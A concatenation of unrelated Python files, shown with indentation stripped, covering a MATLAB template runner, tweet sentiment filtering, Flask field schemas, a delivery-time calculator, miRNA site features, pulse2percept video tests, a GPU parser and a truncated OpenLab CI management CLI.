fanngo_template = fanngo_conf["path"]+"/"+fanngo_conf["template"]
run_file_path = workdir + fanngo_sw_conf["out_dir"] + "/" + config["input"]["basename"] +".fanngo.m"
#print fanngo_template
conf_lines = open(fanngo_template,"r").readlines()
run_file = open(run_file_path,"w")
cwd=os.getcwd()
output = workdir + run_file_path
out_score = workdir + fanngo_sw_conf["out_dir"] + "/" + config["input"]["basename"] +".score.txt"
input_fasta = workdir+"input/"+config["input"]["fasta"]
for line in conf_lines:
line = line.strip()
if line.find("$PATH") > -1:
code_path = cwd+"/"+fanngo_conf["path"]+"/code"
outline = line.replace("$PATH",code_path)
print >>run_file, outline
elif line.find("$INPUT_FASTA") > -1:
outline = line.replace("$INPUT_FASTA",input_fasta)
print >>run_file, outline
elif line.find("$OUTPUT_SCORE") > -1:
outline = line.replace("$OUTPUT_SCORE",out_score)
print >>run_file, outline
else:
print >>run_file, line
run_file.close()
cmd = ["/matlab/bin/matlab", "-nojvm", "-nodisplay", "-nosplash"]
print(" ".join(cmd))
check_output_and_run(out_score,cmd,run_file_path)
|
#!/usr/bin/env python3
# command line args
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--date',required=True)
args = parser.parse_args()
# imports
import os
import zipfile
import datetime
import json
import pandas as pd
from textblob import TextBlob
# load keywords
keywords = ['world series', 'rays', 'dodgers', 'mlb']
# open the zipfile
with zipfile.ZipFile('geoTwitter' + args.date + '.zip') as archive:
# loop over every file within the zip file
for i,filename in enumerate(archive.namelist()):
print(datetime.datetime.now(),args.date,filename)
# open the inner file
with archive.open(filename) as f:
tweets = []
# loop over each line in the inner file
for line in f:
# load the tweet as a python dictionary
tweet = json.loads(line)
text = tweet['text'].lower()
# search hashtags
for keyword in keywords:
if keyword in text:
if tweet \
and isinstance(tweet, dict) \
and 'place' in tweet \
and isinstance(tweet['place'], dict) \
and tweet['place']['country_code'] == 'US' \
and tweet['place']['place_type']=='city':
# print(main_dict)
tweet_dict = {
"text": tweet['text'],
"date": tweet["created_at"],
# "verified": main_dict['user']['verified'],
"city": tweet['place']['name'],
# "country": main_dict['place']['country_code'],
"state": tweet['place']["full_name"][-2:]
}
tweets.append(tweet_dict)
df =pd.DataFrame(tweets)
df['polarity'] = df.apply(lambda tweet: TextBlob(tweet['text']).sentiment.polarity, axis=1)
df.to_csv(args.date + '.csv', index=False)
|
from flask_restful import fields
from server.models.custom_fields import StudentItemField, StatusItemField, UnixTimeStamp
# Fields for classrom.py
classrooms_list_fields = { # Fields list of classrooms
'name': fields.String,
'id': fields.Integer
}
classroom_resource_fields = { # Fields for a single classroom
'name': fields.String,
'id': fields.Integer,
'students': fields.List(StudentItemField)
}
# Fields for report.py
reports_list_fields = { # Fields list of classrooms
'description': fields.String,
'time': UnixTimeStamp(attribute="report_time"),
'id': fields.Integer
}
report_resource_field = {
'description': fields.String,
'id': fields.Integer,
'time': UnixTimeStamp(attribute="report_time"),
'student_statuses': fields.List(StatusItemField)
} |
"""
calculates amount of time required
to deliver list of containers over graph of destination points
according to given transport, destinations and distances
"""
class Transport:
"""abstract transport class"""
def __init__(self, location, distances):
self.distances = distances
self.location = location
self.oper_time = 0
def travel(self, trav_time):
self.oper_time += trav_time
def deliver(self, destination):
self.location = destination
self.oper_time += self.distances[destination]
def way_back(self, back_from):
self.location = self.init_location
self.oper_time += self.distances[back_from]
class Truck(Transport):
"""creates truck instances with given
initial location and available delivery points"""
def __init__(self, location, dest_list):
self.init_location = 'factory'
super().__init__(location, dest_list)
class Ship(Transport):
"""creates ship instances with given
initial location and available delivery points"""
def __init__(self, location, dest_list):
self.init_location = 'port'
super().__init__(location, dest_list)
class Deliver:
"""create instance of current situation, which includes transport,
sources of containers, destinations and distances"""
def __init__(self, given_transport, deliv_string, distances):
self.transport = given_transport
self.deliv_string = deliv_string
self.distances = distances
def est_count(self, current, remain_list, transport_arr):
trucks = []
for i in transport_arr:
if isinstance(i, Truck):
trucks.append(i.location)
for c in set(remain_list):
if c not in self.distances:
raise LookupError('wrong destination given')
est_time = remain_list.count(c) \
* self.distances[c] \
* (len(trucks) - 1)
if est_time > self.distances[current]:
return True
return False
def calculate_time(self):
to_deliver = [c for c in self.deliv_string]
for t in self.transport:
t.oper_time = 0
if isinstance(t, Truck):
t.location = 'factory'
elif isinstance(t, Ship):
t.location = 'port'
port_stack = []
elaps_time = 0
while to_deliver:
for t in self.transport:
if isinstance(t, Truck):
if t.location == 'factory':
if t.oper_time <= elaps_time:
curr = to_deliver.pop(0)
if curr not in self.distances:
raise LookupError('wrong destination given')
if curr == 'A':
t.deliver('port')
port_stack.append((curr, t.oper_time))
else:
t.deliver(curr)
if not to_deliver:
break
if t.location != 'factory' \
and len(to_deliver) > 0 \
and self.est_count(
t.location, to_deliver, self.transport
):
t.way_back(t.location)
elaps_time += 1
while port_stack:
for s in self.transport:
if isinstance(s, Ship):
if s.location == 'port':
port_deliv = port_stack.pop(0)
if s.oper_time < port_deliv[1]:
s.oper_time = port_deliv[1]
s.deliver(port_deliv[0])
elif len(port_stack) > 0:
s.way_back(s.location)
print(
f'list "{self.deliv_string}" will be delivered in \n\
{max([t.oper_time for t in self.transport])} hours'
)
return max([t.oper_time for t in self.transport])
class Calculator:
"""allows to create transport situations and invoke calculation"""
def __init__(self, distances, num_trucks=0, num_ships=0):
if num_trucks == 0 and num_ships == 0:
raise ValueError("transport list is empty")
self.distances = distances
self.transport_creator({'trucks': num_trucks, 'ships': num_ships})
def transport_creator(self, transport):
full_transport = []
for tp in transport:
if tp == 'trucks':
for i in range(transport[tp]):
full_transport.append(
Truck('factory', {'port': 1, 'B': 5})
)
elif tp == 'ships':
for i in range(transport[tp]):
full_transport.append(
Ship('port', {'A': 4})
)
else:
raise AttributeError('wrong transport requested')
self.full_current_transport = full_transport
def process(self, delivery):
transp_graph_situation = Deliver(
self.full_current_transport, delivery, self.distances
)
return transp_graph_situation.calculate_time()
calc = Calculator({'A': 4, 'port': 1, 'B': 5}, num_trucks=2, num_ships=1)
assert calc.process('A') == 5
assert calc.process('AB') == 5
assert calc.process('BB') == 5
assert calc.process('ABB') == 7
calc.process('AABABBAB')
calc.process('ABBBABAAABBB')
|
from optparse import OptionParser
import os
import numpy as np
import pandas as pd
import get_site_features
import utils
np.set_printoptions(threshold=np.inf, linewidth=200)
pd.options.mode.chained_assignment = None
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("--transcripts", dest="TRANSCRIPTS", help="transcript sequence information")
parser.add_option("--mir", dest="MIR", help="miRNA to get features for")
parser.add_option("--mirseqs", dest="MIR_SEQS", help="tsv with miRNAs and their sequences")
parser.add_option("--kds", dest="KDS", help="kd data in tsv format, this family must be included", default=None)
parser.add_option("--sa_bg", dest="SA_BG", help="SA background for 12mers")
parser.add_option("--rnaplfold_dir", dest="RNAPLFOLD_DIR", help="folder with RNAplfold info for transcripts")
parser.add_option("--pct_file", dest="PCT_FILE", default=None, help="file with PCT information")
parser.add_option("--kd_cutoff", dest="KD_CUTOFF", type=float, default=np.inf)
parser.add_option("--outfile", dest="OUTFILE", help="location to write outputs")
parser.add_option("--overlap_dist", dest="OVERLAP_DIST", help="minimum distance between neighboring sites", type=int)
parser.add_option("--upstream_limit", dest="UPSTREAM_LIMIT", help="how far upstream to look for 3p pairing", type=int)
parser.add_option("--only_canon", dest="ONLY_CANON", help="only use canonical sites", default=False, action='store_true')
(options, args) = parser.parse_args()
TRANSCRIPTS = pd.read_csv(options.TRANSCRIPTS, sep='\t', index_col='transcript')
mirseqs = pd.read_csv(options.MIR_SEQS, sep='\t', index_col='mir')
if '_pass' in options.MIR:
MIRSEQ = mirseqs.loc[options.MIR.replace('_pass', '')]['pass_seq']
FAMILY = mirseqs.loc[options.MIR.replace('_pass', '')]['pass_family']
else:
MIRSEQ = mirseqs.loc[options.MIR]['guide_seq']
FAMILY = mirseqs.loc[options.MIR]['guide_family']
SITE8 = utils.rev_comp(MIRSEQ[1:8]) + 'A'
print(options.MIR, SITE8)
# if KD file provided, find sites based on KD file
if options.KDS is not None:
KDS = pd.read_csv(options.KDS, sep='\t')
if options.ONLY_CANON:
KDS = KDS[KDS['aligned_stype'] != 'no site']
KDS = KDS[KDS['best_stype'] == KDS['aligned_stype']]
temp = KDS[KDS['mir'] == FAMILY]
if len(temp) == 0:
raise ValueError('{} not in kd files'.format(FAMILY))
mir_kd_dict = {x: y for (x, y) in zip(temp['12mer'], temp['log_kd']) if (y < options.KD_CUTOFF)}
# find all the sites and KDs
all_features = []
for row in TRANSCRIPTS.iterrows():
all_features.append(get_site_features.get_sites_from_kd_dict_improved(row[0], row[1]['orf_utr3'], mir_kd_dict, options.OVERLAP_DIST))
# otherwise, go by sequence
else:
all_features = []
for row in TRANSCRIPTS.iterrows():
all_features.append(get_site_features.get_sites_from_sequence(row[0], row[1]['orf_utr3'], SITE8,
overlap_dist=options.OVERLAP_DIST, only_canon=options.ONLY_CANON))
all_features = pd.concat(all_features).sort_values('transcript')
all_features['mir'] = options.MIR.replace('_pass', '*')
# add site accessibility background information
temp = pd.read_csv(options.SA_BG, sep='\t', index_col='12mer').reindex(all_features['12mer'].values)
all_features['logSA_bg'] = temp['logp'].values
# add stypes
all_features['stype'] = [utils.get_centered_stype(SITE8, seq) for seq in all_features['12mer'].values]
# sanity check on background
temp = all_features[all_features['stype'] != 'no site']
if len(temp) != len(temp.dropna()):
raise ValueError('Error in site accessibility background assignment')
print('Adding 3p score and SA')
# add transcript-specific information
temp = []
for transcript, group in all_features.groupby('transcript'):
locs = group['loc'].values
# add threep pairing score
sequence = TRANSCRIPTS.loc[transcript]['orf_utr3']
group['Threep'] = [get_site_features.calculate_threep_score(MIRSEQ, sequence, int(loc - 3), options.UPSTREAM_LIMIT) for loc in locs]
# add site accessibility information
lunp_file = os.path.join(options.RNAPLFOLD_DIR, transcript) + '.txt'
rnaplfold_data = pd.read_csv(lunp_file, sep='\t', index_col='end')
group['SA'] = rnaplfold_data.reindex(locs + 7)['14'].values.astype(float) # Agarwal 2015 parameters
group['logSA'] = np.log(group['SA'])
temp.append(group)
all_features = pd.concat(temp)
all_features['orf_length'] = TRANSCRIPTS.reindex(all_features['transcript'].values)['orf_length'].values
all_features['utr3_length'] = TRANSCRIPTS.reindex(all_features['transcript'].values)['utr3_length'].values
all_features['in_ORF'] = all_features['loc'] < (all_features['orf_length'] + 15)
all_features['logSA_diff'] = all_features['logSA'] - all_features['logSA_bg']
all_features['utr3_loc'] = all_features['loc'] - all_features['orf_length']
all_features['passenger'] = ('_pass' in options.MIR) or ('*' in options.MIR)
print('Adding PCT')
# add PCT information if indicated
if options.PCT_FILE is not None:
pct_df = pd.read_csv(options.PCT_FILE, sep='\t', usecols=['Gene ID', 'miRNA family', 'Site type', 'Site start', 'PCT'])
pct_df.columns = ['transcript', 'mir', 'stype', 'loc', 'PCT']
pct_df = pct_df[pct_df['mir'] == FAMILY]
if len(pct_df) == 0:
all_features['PCT'] = 0
print(f"No PCT information for {FAMILY}")
else:
pct_df['offset'] = [1 if x in ['8mer-1a', '7mer-m8'] else 0 for x in pct_df['stype']]
pct_df['loc'] = pct_df['loc'] + pct_df['offset']
pct_df = pct_df[pct_df['stype'] != '6mer']
pct_df = pct_df.set_index(['transcript', 'loc'])
temp1 = all_features[all_features['in_ORF']]
temp1['PCT'] = 0
temp2 = all_features[~all_features['in_ORF']]
temp2['PCT'] = pct_df.reindex(temp2[['transcript', 'utr3_loc']])['PCT'].values
temp2['PCT'] = temp2['PCT'].fillna(0.0)
all_features = pd.concat([temp1, temp2])
else:
print(f"No PCT information for {FAMILY}")
all_features['PCT'] = 0
all_features = all_features.set_index('transcript').sort_index()
# write outputs
all_features.to_csv(options.OUTFILE, sep='\t')
|
import os
import numpy as np
import numpy.testing as npt
import pytest
from unittest import mock
from imp import reload
# Import the whole module so we can reload it:
from pulse2percept.io import video
from pulse2percept.io import image
from pulse2percept import stimuli
from pulse2percept import implants
@pytest.mark.skip(reason='ffmpeg dependency')
def test_video2stim():
reload(image)
reload(video)
# Smoke-test example video
from skvideo import datasets
implant = implants.ArgusI()
video.video2stim(datasets.bikes(), implant)
with pytest.raises(OSError):
video.video2stim('no-such-file.avi', implant)
@pytest.mark.skip(reason='ffmpeg dependency')
def test__set_skvideo_path():
# Smoke-test
video._set_skvideo_path('/usr/bin')
video._set_skvideo_path(libav_path='/usr/bin')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_video_metadata():
# Load a test example
reload(video)
with pytest.raises(OSError):
metadata = video.load_video_metadata('nothing_there.mp4')
from skvideo import datasets
metadata = video.load_video_metadata(datasets.bikes())
npt.assert_equal(metadata['@codec_name'], 'h264')
npt.assert_equal(metadata['@duration_ts'], '128000')
npt.assert_equal(metadata['@r_frame_rate'], '25/1')
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video_metadata(datasets.bikes())
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_framerate():
# Load a test example
reload(video)
with pytest.raises(OSError):
video.load_video_metadata('nothing_there.mp4')
from skvideo import datasets
fps = video.load_video_framerate(datasets.bikes())
npt.assert_equal(fps, 25)
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video_framerate(datasets.bikes())
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_video():
reload(video)
# Load a test example
from skvideo import datasets
# Load with default values
movie = video.load_video(datasets.bikes(), as_timeseries=False)
npt.assert_equal(isinstance(movie, np.ndarray), True)
npt.assert_equal(movie.shape, [250, 272, 640, 3])
# Load as grayscale
movie = video.load_video(datasets.bikes(), as_timeseries=False,
as_gray=True)
npt.assert_equal(isinstance(movie, np.ndarray), True)
npt.assert_equal(movie.shape, [250, 272, 640, 1])
# Load as TimeSeries
movie = video.load_video(datasets.bikes(), as_timeseries=True)
fps = video.load_video_framerate(datasets.bikes())
npt.assert_equal(isinstance(movie, stimuli.TimeSeries), True)
npt.assert_almost_equal(movie.tsample, 1.0 / fps)
npt.assert_equal(movie.shape, [272, 640, 3, 250])
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video('invalid.avi')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_video_generator():
# Load a test example
reload(video)
from skvideo import datasets
reader = video.load_video_generator(datasets.bikes())
for frame in reader.nextFrame():
npt.assert_equal(frame.shape, [272, 640, 3])
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video_generator('invalid.avi')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_save_video():
# Load a test example
reload(video)
from skvideo import datasets
# There and back again: ndarray
videoin = video.load_video(datasets.bikes(), as_timeseries=False)
fpsin = video.load_video_framerate(datasets.bikes())
video.save_video(videoin, 'myvideo.mp4', fps=fpsin)
videout = video.load_video('myvideo.mp4', as_timeseries=False)
npt.assert_equal(videoin.shape, videout.shape)
npt.assert_almost_equal(videout / 255.0, videoin / 255.0, decimal=0)
# Write to file with different frame rate, widths, and heights
fpsout = 15
video.save_video(videoin, 'myvideo.mp4', width=100, fps=fpsout)
npt.assert_equal(video.load_video_framerate('myvideo.mp4'), fpsout)
videout = video.load_video('myvideo.mp4', as_timeseries=False)
npt.assert_equal(videout.shape[2], 100)
video.save_video(videoin, 'myvideo.mp4', height=20, fps=fpsout)
videout = video.load_video('myvideo.mp4', as_timeseries=False)
npt.assert_equal(videout.shape[1], 20)
videout = None
# There and back again: TimeSeries
tsamplein = 1.0 / float(fpsin)
tsampleout = 1.0 / float(fpsout)
rollaxes = np.roll(range(videoin.ndim), -1)
tsin = stimuli.TimeSeries(tsamplein, np.transpose(videoin, rollaxes))
video.save_video(tsin, 'myvideo.mp4', fps=fpsout)
npt.assert_equal(tsin.tsample, tsamplein)
tsout = video.load_video('myvideo.mp4', as_timeseries=True)
npt.assert_equal(video.load_video_framerate('myvideo.mp4'), fpsout)
npt.assert_equal(isinstance(tsout, stimuli.TimeSeries), True)
npt.assert_almost_equal(tsout.tsample, tsampleout)
# Also verify the actual data
tsres = tsin.resample(tsampleout)
npt.assert_equal(tsout.shape, tsres.shape)
npt.assert_almost_equal(tsout.data / 255.0, tsres.data / tsres.data.max(),
decimal=0)
os.remove('myvideo.mp4')
with pytest.raises(TypeError):
video.save_video([2, 3, 4], 'invalid.avi')
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video(videoin, 'invalid.avi')
with mock.patch.dict("sys.modules", {"skimage": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video(videoin, 'invalid.avi')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_save_video_sidebyside():
reload(video)
from skvideo import datasets
videoin = video.load_video(datasets.bikes(), as_timeseries=False)
fps = video.load_video_framerate(datasets.bikes())
tsample = 1.0 / float(fps)
rollaxes = np.roll(range(videoin.ndim), -1)
percept = stimuli.TimeSeries(tsample, np.transpose(videoin, rollaxes))
video.save_video_sidebyside(datasets.bikes(), percept, 'mymovie.mp4',
fps=fps)
videout = video.load_video('mymovie.mp4', as_timeseries=False)
npt.assert_equal(videout.shape[0], videoin.shape[0])
npt.assert_equal(videout.shape[1], videoin.shape[1])
npt.assert_equal(videout.shape[2], videoin.shape[2] * 2)
npt.assert_equal(videout.shape[3], videoin.shape[3])
os.remove('mymovie.mp4')
with pytest.raises(TypeError):
video.save_video_sidebyside(datasets.bikes(), [2, 3, 4], 'invalid.avi')
with mock.patch.dict("sys.modules", {"skvideo": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video_sidebyside(datasets.bikes(), percept,
'invalid.avi')
with mock.patch.dict("sys.modules", {"skimage": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video_sidebyside(datasets.bikes(), percept,
'invalid.avi')
|
from typing import List, Any
from dataclasses import dataclass
import pyjq
GPU_MODELS = ['Quadro RTX 6000/8000', 'Tesla T4']
@dataclass(frozen=True)
class GPU:
"""
Note that because GPUs aren't properly part of Ralph catalog structure,
they appear as special fields inside the node and as such are not
subclassed from RalphAsset (they don't have a URL).
"""
Model: str
Description: str
BDF: str
@staticmethod
def find_gpus(node_raw_json) -> List[Any]:
"""
Find if there are GPUs in this node. Returns a list
of GPU objects (which can be empty).
"""
custom_fields = pyjq.one('.custom_fields', node_raw_json)
ret = list()
for field in custom_fields:
for gpu_model in GPU_MODELS:
if gpu_model in custom_fields[field]:
model = gpu_model
description = custom_fields[field]
bdf = custom_fields[field + '_pci_id']
ret.append(GPU(model, description, bdf))
return ret |
import argparse
import configparser
import os
import subprocess
import sys
import yaml
from openlabcmd import exceptions
from openlabcmd.plugins import base
from openlabcmd import utils
from openlabcmd.utils import _color
from openlabcmd import zk
from openlabcmd import repo
from openlabcmd import hint
class OpenLabCmd(object):
def __init__(self):
self.parser = None
self.args = None
self.config = None
self.zk = None
@staticmethod
def _str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
@staticmethod
def _node_name_format(v):
spl_v = v.split('-')
if (len(spl_v) < 2 or spl_v[-2] != 'openlab' or
spl_v[-1] not in ['nodepool', 'zuul', 'zookeeper']):
raise argparse.ArgumentTypeError(
'Node name should be format like: '
'{cloud_provider}-openlab-{type}')
return v
def _add_check_cmd(self, parser):
# openlab check
cmd_check = parser.add_parser('check',
help='Check OpenLab environment.')
cmd_check.set_defaults(func=self.check)
cmd_check.add_argument('--type', default='default',
help="Specify a plugin type, like 'nodepool', "
"'jobs', 'all'. Default is 'default',"
" will skip the experimental plugins.")
cmd_check.add_argument('--cloud', default='all',
help="Specify a cloud provider, like 'otc', "
"'vexxhost'. Default is 'all'.")
cmd_check.add_argument('--nocolor', action='store_true',
help='Enable the no color mode.')
cmd_check.add_argument('--recover', action='store_true',
help='Enable the auto recover mode.')
def _add_hint_cmd(self, parser):
# openlab hint
cmd_hint = parser.add_parser(
'hint',
help='Print hint info.')
cmd_hint.set_defaults(func=self.hint)
cmd_hint.add_argument('--type', default='all',
help="Specify a hint type, "
"like 'resource', 'redundant'.")
def _add_repo_cmd(self, parser):
# openlab repo list
cmd_repo = parser.add_parser(
'repo',
help='The repos which enable the OpenLab.')
cmd_repo_list_sub = cmd_repo.add_subparsers(title='repo',dest='repo')
cmd_repo_list = cmd_repo_list_sub.add_parser(
'list', help='List the repos which enable the OpenLab app.')
cmd_repo_list.set_defaults(func=self.repo_list)
cmd_repo_list.add_argument('--server', default='github.com',
help="Specify base server url. Default is "
"github.com")
cmd_repo_list.add_argument(
'--app-id', default='6778',
help="Specify the github APP ID, Default is 6778 (allinone: 7102,"
" OpenLab: 6778).")
cmd_repo_list.add_argument(
'--app-key', default='/var/lib/zuul/openlab-app-key.pem',
help='Specify the app key file path. Default is '
'/var/lib/zuul/openlab-app-key.pem')
def _add_ha_node_cmd(self, parser):
# openlab ha node
cmd_ha_node = parser.add_parser('node', help='Manage HA node.')
cmd_ha_node_subparsers = cmd_ha_node.add_subparsers(title='node',
dest='node')
# openlab ha node list
cmd_ha_node_list = cmd_ha_node_subparsers.add_parser(
'list', help='List all nodes.')
cmd_ha_node_list.set_defaults(func=self.ha_node_list)
cmd_ha_node_list.add_argument(
'--type', action='append',
choices=['nodepool', 'zuul', 'zookeeper'],
help='Filter the services with the specified node type.')
cmd_ha_node_list.add_argument(
'--role', action='append',
choices=['master', 'slave', 'zookeeper'],
help='Filter the services with the specified node role.')
# openlab ha node get
cmd_ha_node_get = cmd_ha_node_subparsers.add_parser(
'get', help='Get a node.')
cmd_ha_node_get.set_defaults(func=self.ha_node_get)
cmd_ha_node_get.add_argument('name', help='The node hostname.')
# openlab ha node create
cmd_ha_node_create = cmd_ha_node_subparsers.add_parser(
'init', help='Create a new node. This command usually should be '
'called by CI environment deploy tools when creating '
'a new system. Operators should be careful for this '
'command. One case for this command may like: the '
'data in zookeeper is broken or missing, but the '
'node works well, so that operators need to rebuild '
'the node info.')
cmd_ha_node_create.set_defaults(func=self.ha_node_create)
cmd_ha_node_create.add_argument(
'name', type=self._node_name_format,
help='The new node hostname, it should be global unique. Format: '
'{cloud-provider}-openlab-{type}.')
cmd_ha_node_create.add_argument(
'--type', required=True, choices=['nodepool', 'zuul', 'zookeeper'],
help="The new node type. Choose from 'nodepool', 'zuul' and "
"'zookeeper'")
cmd_ha_node_create.add_argument(
'--role', required=True, choices=['master', 'slave', 'zookeeper'],
help="The new node role. It should be 'master', 'slave' or "
"'zookeeper'.")
cmd_ha_node_create.add_argument(
'--ip', required=True, help="The new node's public IP.")
# openlab ha node set
cmd_ha_node_set = cmd_ha_node_subparsers.add_parser(
'set', help='Update a node.')
cmd_ha_node_set.set_defaults(func=self.ha_node_update)
cmd_ha_node_set.add_argument('name', help='The node hostname.')
cmd_ha_node_set.add_argument('--maintain', metavar='{yes, no}',
type=self._str2bool,
help='Set the node to maintained status.')
cmd_ha_node_set.add_argument(
'--role', choices=['master', 'slave'],
help="Update node role. It should be either 'master' or 'slave'. "
"Be careful to update the role, you should not update role "
"except emergency situations, because it will impact "
"checking scope of HA monitor , HA monitor will check and "
"update it with built-in policy automatically.")
# openlab ha node delete
cmd_ha_node_delete = cmd_ha_node_subparsers.add_parser(
'delete', help='Delete a node.')
cmd_ha_node_delete.set_defaults(func=self.ha_node_delete)
cmd_ha_node_delete.add_argument('name', help='The node hostname.')
def _add_ha_service_cmd(self, parser):
# openlab ha service
cmd_ha_service = parser.add_parser('service',
help='Manage HA service.')
cmd_ha_service_subparsers = cmd_ha_service.add_subparsers(
title='service', dest='service')
# openlab ha service list
cmd_ha_service_list = cmd_ha_service_subparsers.add_parser(
'list', help='List all services.')
cmd_ha_service_list.set_defaults(func=self.ha_service_list)
cmd_ha_service_list.add_argument(
'--node', action='append',
help='Filter the services with the specified node name.')
cmd_ha_service_list.add_argument(
'--role', action='append',
choices=['master', 'slave', 'zookeeper'],
help='Filter the services with the specified node role.')
cmd_ha_service_list.add_argument(
'--status', action='append',
choices=['up', 'down', 'restarting'],
help='Filter the services with the specified status.')
# openlab ha service get
cmd_ha_service_get = cmd_ha_service_subparsers.add_parser(
'get', help='Get a service.')
cmd_ha_service_get.set_defaults(func=self.ha_service_get)
cmd_ha_service_get.add_argument('name', help='service name.')
cmd_ha_service_get.add_argument(
'--node', required=True, help="The node where the service run.")
def _add_ha_cluster_cmd(self, parser):
# openlab ha cluster
cmd_ha_cluster = parser.add_parser('cluster',
help='Manage HA cluster.')
cmd_ha_cluster_subparsers = cmd_ha_cluster.add_subparsers(
title='cluster', dest='cluster')
# openlab ha cluster switch
cmd_ha_service_get = cmd_ha_cluster_subparsers.add_parser(
'switch', help='Switch Master and Slave role.')
cmd_ha_service_get.set_defaults(func=self.ha_cluster_switch)
# openlab ha cluster repair
cmd_ha_cluster_repair = cmd_ha_cluster_subparsers.add_parser(
'repair', help='HA deployment check and repair.')
cmd_ha_cluster_repair.set_defaults(func=self.ha_cluster_repair)
cmd_ha_cluster_repair.add_argument(
'--security-group',
help='Repair the Security Group of HA deployment.',
action='store_true', required=True)
cmd_ha_cluster_repair.add_argument(
'--dry-run', help='Only report the check list of HA deployment,'
' not try to repair if there is a check error.',
action='store_true')
def _add_ha_config_cmd(self, parser):
# openlab ha cluster
cmd_ha_config = parser.add_parser('config',
help='Manage HA cluster '
'configuration.')
cmd_ha_config_subparsers = cmd_ha_config.add_subparsers(
title='config', dest='configuration')
# openlab ha config list
cmd_ha_config_list = cmd_ha_config_subparsers.add_parser(
'list', help='List all HA cluster config options.')
cmd_ha_config_list.set_defaults(func=self.ha_config_list)
# openlab ha config set
cmd_ha_config_set = cmd_ha_config_subparsers.add_parser(
'set', help='Update a HA cluster config option.')
cmd_ha_config_set.set_defaults(func=self.ha_config_update)
cmd_ha_config_set.add_argument('name',
help='The name of config option.')
cmd_ha_config_set.add_argument('value',
help='The value of config option.')
def _add_ha_cmd(self, parser):
# openlab ha
cmd_ha = parser.add_parser('ha',
help='Manage OpenLab HA deployment.')
cmd_ha_subparsers = cmd_ha.add_subparsers(title='ha', dest='ha')
self._add_ha_node_cmd(cmd_ha_subparsers)
self._add_ha_service_cmd(cmd_ha_subparsers)
self._add_ha_cluster_cmd(cmd_ha_subparsers)
self._add_ha_config_cmd(cmd_ha_subparsers)
def create_parser(self):
parser = argparse.ArgumentParser(
description='The command line tool for OpenLab management',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-c', dest='config',
help='path to config file')
parser.add_argument('-f', dest='format', choices=['raw', 'pretty'],
default='pretty',
help='output format')
subparsers = parser.add_subparsers(title='commands',
dest='command')
self._add_hint_cmd(subparsers)
self._add_repo_cmd(subparsers)
self._add_check_cmd(subparsers)
self._add_ha_cmd(subparsers)
return parser
def _get_cloud_list(self, cloud):
cloud_conf_location = self.config.get(
'check', 'cloud_conf', fallback='/etc/openstack/clouds.yaml')
with open(cloud_conf_location) as f:
clouds = yaml.load(f, Loader=yaml.FullLoader)
clouds_list = [c for c in clouds['clouds']]
if cloud not in clouds_list + ['all']:
raise exceptions.ClientError(
"Error: Cloud %(cloud)s is not found. Please use the cloud "
"in %(clouds_list)s or just use 'all'." % {
'cloud': cloud, 'clouds_list': clouds_list})
clouds_list = clouds_list if cloud == 'all' else [cloud]
return clouds_list
def _header_print(self, header):
print(_color(header))
print(_color("=" * 48))
def hint(self):
h = hint.Hint(self.args.type)
h.print_hints()
def repo_list(self):
r = repo.Repo(self.args.server,
self.args.app_id,
self.args.app_key)
repos = r.list()
print(utils.format_output('repo', repos))
print("Total: %s" % len(repos))
def check(self):
utils.NOCOLOR = self.args.nocolor
cloud_list = self._get_cloud_list(self.args.cloud)
if self.args.type == 'default':
plugins = list(filter(lambda x: not x.experimental,
base.Plugin.plugins))
elif self.args.type == 'all':
plugins = base.Plugin.plugins
else:
# Filter the plugins with specific ptype
plugins = list(filter(lambda x: x.ptype == self.args.type,
base.Plugin.plugins))
cnt = len(cloud_list)
exit_flag = False
for index, cloud in enumerate(cloud_list):
header = "%s/%s. %s cloud check" % (index + 1, cnt, cloud)
self._header_print(header)
for plugin_class in plugins:
plugin = plugin_class(cloud, self.config)
plugin.check_begin()
plugin.check()
plugin.check_end()
# the failed flag would be record when do check()
if self.args.recover and plugin.failed:
plugin.recover()
if plugin.failed:
exit_flag = True
if exit_flag:
raise exceptions.ClientError("Error: cloud check failed.")
def _zk_wrapper(func):
def wrapper(self, *args, **kwargs):
if self.zk is None:
self.zk = zk.ZooKeeper(config=self.config)
try:
self.zk.connect()
func(self, *args, **kwargs)
finally:
self.zk.disconnect()
return wrapper
@_zk_wrapper
def ha_node_list(self):
result = self.zk.list_nodes(node_role_filter=self.args.role,
node_type_filter=self.args.type)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
dict_result = []
for node in result:
dict_result.append(node.to_dict())
print(dict_result)
@_zk_wrapper
def ha_node_get(self):
node_name = self.args.name
result = self.zk.get_node(node_name)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_node_create(self):
if self.args.type == 'zookeeper':
if self.args.role != 'zookeeper':
raise argparse.ArgumentTypeError(
'zookeeper node must be zookeeper type.')
else:
if self.args.role == 'zookeeper':
raise argparse.ArgumentTypeError(
'zookeeper node must be zookeeper type.')
result = self.zk.create_node(self.args.name, self.args.role,
self.args.type, self.args.ip)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
